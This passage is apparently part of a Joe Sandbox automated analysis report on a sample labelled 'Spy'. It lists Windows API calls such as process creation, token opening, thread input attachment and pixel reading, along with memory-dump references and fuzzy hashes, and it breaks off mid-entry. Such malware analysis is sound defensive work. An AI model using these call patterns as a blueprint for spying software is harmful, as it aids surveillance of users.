                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID:
                                                      • API String ID: 3850602802-0
                                                      • Opcode ID: b58ec3223e1bfc2dbf1447c9469d3cd7c24b9b6d54bcbf90e2d6c693c9cd7f7c
                                                      • Instruction ID: 808076a1add889721b2ec957cf10676d9e702b404cdfb9d470457e8a9fcd1954
                                                      • Opcode Fuzzy Hash: b58ec3223e1bfc2dbf1447c9469d3cd7c24b9b6d54bcbf90e2d6c693c9cd7f7c
                                                      • Instruction Fuzzy Hash: 75115A39900218FFEB10DF95CD84EDEBBB8FB48710F204092E901B7290D671AE10DB90
                                                      APIs
                                                        • Part of subcall function 00A829E2: GetWindowLongW.USER32(?,000000EB), ref: 00A829F3
                                                      • DefDlgProcW.USER32(?,00000020,?), ref: 00A816B4
                                                      • GetClientRect.USER32(?,?), ref: 00ABB93C
                                                      • GetCursorPos.USER32(?), ref: 00ABB946
                                                      • ScreenToClient.USER32(?,?), ref: 00ABB951
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: Client$CursorLongProcRectScreenWindow
                                                      • String ID:
                                                      • API String ID: 4127811313-0
                                                      • Opcode ID: 8425e3a6163e85b52fdcf2ca200c9a7a12090b9a0ac3ce0355738885a612a472
                                                      • Instruction ID: 6588e0ab5c576a5e2de78e017f8dd9dfdfae46bb9f67b5697dab947b09a90e36
                                                      • Opcode Fuzzy Hash: 8425e3a6163e85b52fdcf2ca200c9a7a12090b9a0ac3ce0355738885a612a472
                                                      • Instruction Fuzzy Hash: A0112839A10119ABCB10FF54C885DFE77B9FB05300F544466F981E7150EB74BA92CBA1
                                                      APIs
                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00A8214F
                                                      • GetStockObject.GDI32(00000011), ref: 00A82163
                                                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 00A8216D
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: CreateMessageObjectSendStockWindow
                                                      • String ID:
                                                      • API String ID: 3970641297-0
                                                      • Opcode ID: 434ca1b1c29da95d7a6b2bf9a521ec383878686cbbf0e2a3c0dac24611b696dd
                                                      • Instruction ID: d0e7a149946f67070f574e5b066aeb7380ea77325535d04c5c409d044110d47f
                                                      • Opcode Fuzzy Hash: 434ca1b1c29da95d7a6b2bf9a521ec383878686cbbf0e2a3c0dac24611b696dd
                                                      • Instruction Fuzzy Hash: 1B118B7211124DBFDB02AFA09C48EEABB69EF58354F154202FA0452064CB71DCA0DBA0
                                                      APIs
                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00AE04EC,?,00AE153F,?,00008000), ref: 00AE195E
                                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,00AE04EC,?,00AE153F,?,00008000), ref: 00AE1983
                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00AE04EC,?,00AE153F,?,00008000), ref: 00AE198D
                                                      • Sleep.KERNEL32(?,?,?,?,?,?,?,00AE04EC,?,00AE153F,?,00008000), ref: 00AE19C0
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: CounterPerformanceQuerySleep
                                                      • String ID:
                                                      • API String ID: 2875609808-0
                                                      • Opcode ID: d2d1d714062449e9456198ba6b4f829981fdf566fda3c8af2b8547272bae192b
                                                      • Instruction ID: 6f98d533f980a6aa1f9692c01a17f4915307efe2088934c6869120e901c259ff
                                                      • Opcode Fuzzy Hash: d2d1d714062449e9456198ba6b4f829981fdf566fda3c8af2b8547272bae192b
                                                      • Instruction Fuzzy Hash: 45113C31D0456DEBCF00AFE6D998AEEBB78FF09751F408155E980B3242CB3496A08B95
                                                      APIs
                                                      • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 00B0E1EA
                                                      • LoadTypeLibEx.OLEAUT32(?,00000002,0000000C), ref: 00B0E201
                                                      • RegisterTypeLib.OLEAUT32(0000000C,?,00000000), ref: 00B0E216
                                                      • RegisterTypeLibForUser.OLEAUT32(0000000C,?,00000000), ref: 00B0E234
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: Type$Register$FileLoadModuleNameUser
                                                      • String ID:
                                                      • API String ID: 1352324309-0
                                                      • Opcode ID: 8bfd5ab92a10f77c9f6f3acfa76182743d2604e2d8bb2b2daaba5aec03b58b48
                                                      • Instruction ID: ca9674c70e9441e898109c279bb2ad069436972c05a34e6fe5bebdfaf7de5ffd
                                                      • Opcode Fuzzy Hash: 8bfd5ab92a10f77c9f6f3acfa76182743d2604e2d8bb2b2daaba5aec03b58b48
                                                      • Instruction Fuzzy Hash: FD115EB52053049BE7309F51ED48F93BBFCEB40B00F108999A626D6190DBB0E5449BA1
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                      • String ID:
                                                      • API String ID: 3016257755-0
                                                      • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                      • Instruction ID: ce5863f4027d1d8f18c25c9af6f7905e581a62f7b280632b567b0a3466d7eea1
                                                      • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                      • Instruction Fuzzy Hash: 30019E3204814EBBCF125F84CC01CEE3F2ABBA9340F098515FE1868132C776C9B1AB81
                                                      APIs
                                                      • GetWindowRect.USER32(?,?), ref: 00B0B956
                                                      • ScreenToClient.USER32(?,?), ref: 00B0B96E
                                                      • ScreenToClient.USER32(?,?), ref: 00B0B992
                                                      • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00B0B9AD
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: ClientRectScreen$InvalidateWindow
                                                      • String ID:
                                                      • API String ID: 357397906-0
                                                      • Opcode ID: 069d795c5b2355c9fc89fbcd4a9df896a8ae4bc548efa81b57f3561975633974
                                                      • Instruction ID: 0a96f412bf2ad4ec2411d46993958a4749e2b6c03b164052c36dfe8f2b7cd141
                                                      • Opcode Fuzzy Hash: 069d795c5b2355c9fc89fbcd4a9df896a8ae4bc548efa81b57f3561975633974
                                                      • Instruction Fuzzy Hash: B81144B9D00209EFDB41DF98C984AEEBBF9FF48310F508156E914E3610D775AA658F50
                                                      APIs
                                                      • _memset.LIBCMT ref: 00B0BCB6
                                                      • _memset.LIBCMT ref: 00B0BCC5
                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00B48F20,00B48F64), ref: 00B0BCF4
                                                      • CloseHandle.KERNEL32 ref: 00B0BD06
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: _memset$CloseCreateHandleProcess
                                                      • String ID:
                                                      • API String ID: 3277943733-0
                                                      • Opcode ID: 237416d36b093ed81f5a13a0ad9f75e4e9ae480a7dbc9ff1e46bf3eea2550f2c
                                                      • Instruction ID: 794f700a2ea8980b5d852e05aff99e6dc73e548e03300f8d4fdc55b441ff7828
                                                      • Opcode Fuzzy Hash: 237416d36b093ed81f5a13a0ad9f75e4e9ae480a7dbc9ff1e46bf3eea2550f2c
                                                      • Instruction Fuzzy Hash: 3AF05EB6550304BFE6503B65AC05FBF7A9DEB0A750F004921BA08EB1A2DF724A1497A9
                                                      APIs
                                                      • EnterCriticalSection.KERNEL32(?), ref: 00AE71A1
                                                        • Part of subcall function 00AE7C7F: _memset.LIBCMT ref: 00AE7CB4
                                                      • _memmove.LIBCMT ref: 00AE71C4
                                                      • _memset.LIBCMT ref: 00AE71D1
                                                      • LeaveCriticalSection.KERNEL32(?), ref: 00AE71E1
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection_memset$EnterLeave_memmove
                                                      • String ID:
                                                      • API String ID: 48991266-0
                                                      • Opcode ID: be8ecae95c319ac43de39d84cbf2e1fddcc3e70e9b32823c2a6e0c815749c766
                                                      • Instruction ID: bd980256a38185fe9e4d283ba047c1d27ba406083abe331b56c102f5ee91cfdf
                                                      • Opcode Fuzzy Hash: be8ecae95c319ac43de39d84cbf2e1fddcc3e70e9b32823c2a6e0c815749c766
                                                      • Instruction Fuzzy Hash: F8F0543A100104ABCF016F55DD85A8ABB29EF4A320F04C051FE085F25ACB75A951DBB4
                                                      APIs
                                                        • Part of subcall function 00A816CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00A81729
                                                        • Part of subcall function 00A816CF: SelectObject.GDI32(?,00000000), ref: 00A81738
                                                        • Part of subcall function 00A816CF: BeginPath.GDI32(?), ref: 00A8174F
                                                        • Part of subcall function 00A816CF: SelectObject.GDI32(?,00000000), ref: 00A81778
                                                      • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00B0C3E8
                                                      • LineTo.GDI32(00000000,?,?), ref: 00B0C3F5
                                                      • EndPath.GDI32(00000000), ref: 00B0C405
                                                      • StrokePath.GDI32(00000000), ref: 00B0C413
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                      • String ID:
                                                      • API String ID: 1539411459-0
                                                      • Opcode ID: f2daae1cff7f5494c096d2e10d0f5dfa8a4d4dc93ef9725fe9750535833fafe4
                                                      • Instruction ID: b977add5847bd41d1cdcb75ff16aee132551dcedc3c3ca005f1d273bbff7c743
                                                      • Opcode Fuzzy Hash: f2daae1cff7f5494c096d2e10d0f5dfa8a4d4dc93ef9725fe9750535833fafe4
                                                      • Instruction Fuzzy Hash: 05F0BE31045218BBDB126F55AC0EFCE3F99BF0A310F448040FA51621E1CBB416A5DBA9
                                                      APIs
                                                      • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00ADAA6F
                                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 00ADAA82
                                                      • GetCurrentThreadId.KERNEL32 ref: 00ADAA89
                                                      • AttachThreadInput.USER32(00000000), ref: 00ADAA90
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                      • String ID:
                                                      • API String ID: 2710830443-0
                                                      • Opcode ID: e310340a574d058b6dd5d17797b901cb497a7fbf1cdcf076d0fb772d5f9f579f
                                                      • Instruction ID: 8d82df5f76316cdb9bd6ba0ba8a0dbc019cb7873b0495cf3d9c4142d209ba4c7
                                                      • Opcode Fuzzy Hash: e310340a574d058b6dd5d17797b901cb497a7fbf1cdcf076d0fb772d5f9f579f
                                                      • Instruction Fuzzy Hash: 8AE0E53154522876DB216FA1DD0DED77F6CEF267E1F40C116F50995060CBB58590CBE1
                                                      APIs
                                                      • GetSysColor.USER32(00000008), ref: 00A8260D
                                                      • SetTextColor.GDI32(?,000000FF), ref: 00A82617
                                                      • SetBkMode.GDI32(?,00000001), ref: 00A8262C
                                                      • GetStockObject.GDI32(00000005), ref: 00A82634
                                                      • GetWindowDC.USER32(?,00000000), ref: 00ABC1C4
                                                      • GetPixel.GDI32(00000000,00000000,00000000), ref: 00ABC1D1
                                                      • GetPixel.GDI32(00000000,?,00000000), ref: 00ABC1EA
                                                      • GetPixel.GDI32(00000000,00000000,?), ref: 00ABC203
                                                      • GetPixel.GDI32(00000000,?,?), ref: 00ABC223
                                                      • ReleaseDC.USER32(?,00000000), ref: 00ABC22E
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                      • String ID:
                                                      • API String ID: 1946975507-0
                                                      • Opcode ID: 24e61949b54abef2f85cc311003d1068f344d6951caf4d2d9fce91918b647e73
                                                      • Instruction ID: b18db6821f12a5bed5f2569a3cf0833cbfeda140c608cd17ae61bf8a0541cbf0
                                                      • Opcode Fuzzy Hash: 24e61949b54abef2f85cc311003d1068f344d6951caf4d2d9fce91918b647e73
                                                      • Instruction Fuzzy Hash: 6EE06D31514244BBDB216FB8BC49BE83B15EB15332F54C366FA69680E2CBB14AD0DB11
                                                      APIs
                                                      • GetCurrentThread.KERNEL32 ref: 00AD9339
                                                      • OpenThreadToken.ADVAPI32(00000000,?,?,?,00AD8F04), ref: 00AD9340
                                                      • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00AD8F04), ref: 00AD934D
                                                      • OpenProcessToken.ADVAPI32(00000000,?,?,?,00AD8F04), ref: 00AD9354
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: CurrentOpenProcessThreadToken
                                                      • String ID:
                                                      • API String ID: 3974789173-0
                                                      • Opcode ID: 40c0be3564e177cbc3c0953c2bc8cda8a6ec1bc332bb4f2b6dc4cceff3ce8765
                                                      • Instruction ID: 48e8ab8f4fc8becc10ff46ebba0c0f02aead099122f46f9197dbaba35c0da15c
                                                      • Opcode Fuzzy Hash: 40c0be3564e177cbc3c0953c2bc8cda8a6ec1bc332bb4f2b6dc4cceff3ce8765
                                                      • Instruction Fuzzy Hash: E7E04F366112159FD7202FB16D0DB973B6CAF56791F118818A246CF090EE749584C754
                                                      APIs
                                                      • GetDesktopWindow.USER32 ref: 00AC0679
                                                      • GetDC.USER32(00000000), ref: 00AC0683
                                                      • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00AC06A3
                                                      • ReleaseDC.USER32(?), ref: 00AC06C4
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: CapsDesktopDeviceReleaseWindow
                                                      • String ID:
                                                      • API String ID: 2889604237-0
                                                      • Opcode ID: 845c54679ac3cbb29024c4e6c82a1962f277ae1d4b73eda3172dbb59cf3f2361
                                                      • Instruction ID: b5691c3da1e6b83412e5952375e8dbb1bfc8a93496b590599d419a8246ecef99
                                                      • Opcode Fuzzy Hash: 845c54679ac3cbb29024c4e6c82a1962f277ae1d4b73eda3172dbb59cf3f2361
                                                      • Instruction Fuzzy Hash: EEE0E571810204EFCB01AF60D808A9D7BB1AB8C310F51C009F85AE7210DFB885919F50
                                                      APIs
                                                      • GetDesktopWindow.USER32 ref: 00AC068D
                                                      • GetDC.USER32(00000000), ref: 00AC0697
                                                      • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00AC06A3
                                                      • ReleaseDC.USER32(?), ref: 00AC06C4
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: CapsDesktopDeviceReleaseWindow
                                                      • String ID:
                                                      • API String ID: 2889604237-0
                                                      • Opcode ID: c15b7d136e040355fed302cbe58d72bdc0f1c345fe6bace309029ddd8d5c2e14
                                                      • Instruction ID: fe315722349c5d6a8c76757c63a7346cfa2b7a5bce59882d2ff8352fa2d5cd9e
                                                      • Opcode Fuzzy Hash: c15b7d136e040355fed302cbe58d72bdc0f1c345fe6bace309029ddd8d5c2e14
                                                      • Instruction Fuzzy Hash: 43E012B1810204AFCB02AFA0D80CA9D7BF2AB8C310F51C008F95AE7210DFB895918F50
                                                      APIs
                                                        • Part of subcall function 00A9436A: _wcscpy.LIBCMT ref: 00A9438D
                                                        • Part of subcall function 00A84D37: __itow.LIBCMT ref: 00A84D62
                                                        • Part of subcall function 00A84D37: __swprintf.LIBCMT ref: 00A84DAC
                                                      • __wcsnicmp.LIBCMT ref: 00AEB670
                                                      • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00AEB739
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                      • String ID: LPT
                                                      • API String ID: 3222508074-1350329615
                                                      • Opcode ID: e0511f30c97e0450e9428a57b59369eed94db3654a0ee25defc8345a5bfb2ba8
                                                      • Instruction ID: 95ab2c5c5d9f04da1bef498b60aba8614b4b361f66e7126c19a2ac21a6310b41
                                                      • Opcode Fuzzy Hash: e0511f30c97e0450e9428a57b59369eed94db3654a0ee25defc8345a5bfb2ba8
                                                      • Instruction Fuzzy Hash: CC61A275A10219EFCB14EF95C995EAFB7B4EF48310F118159F906AB391DB70AE40CBA0
                                                      APIs
                                                      • Sleep.KERNEL32(00000000), ref: 00A8E01E
                                                      • GlobalMemoryStatusEx.KERNEL32(?), ref: 00A8E037
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: GlobalMemorySleepStatus
                                                      • String ID: @
                                                      • API String ID: 2783356886-2766056989
                                                      • Opcode ID: eb6a8e3768c31641c30ea7ce571ab78f4894104cbd1b53caf71c58b0a5dadb9f
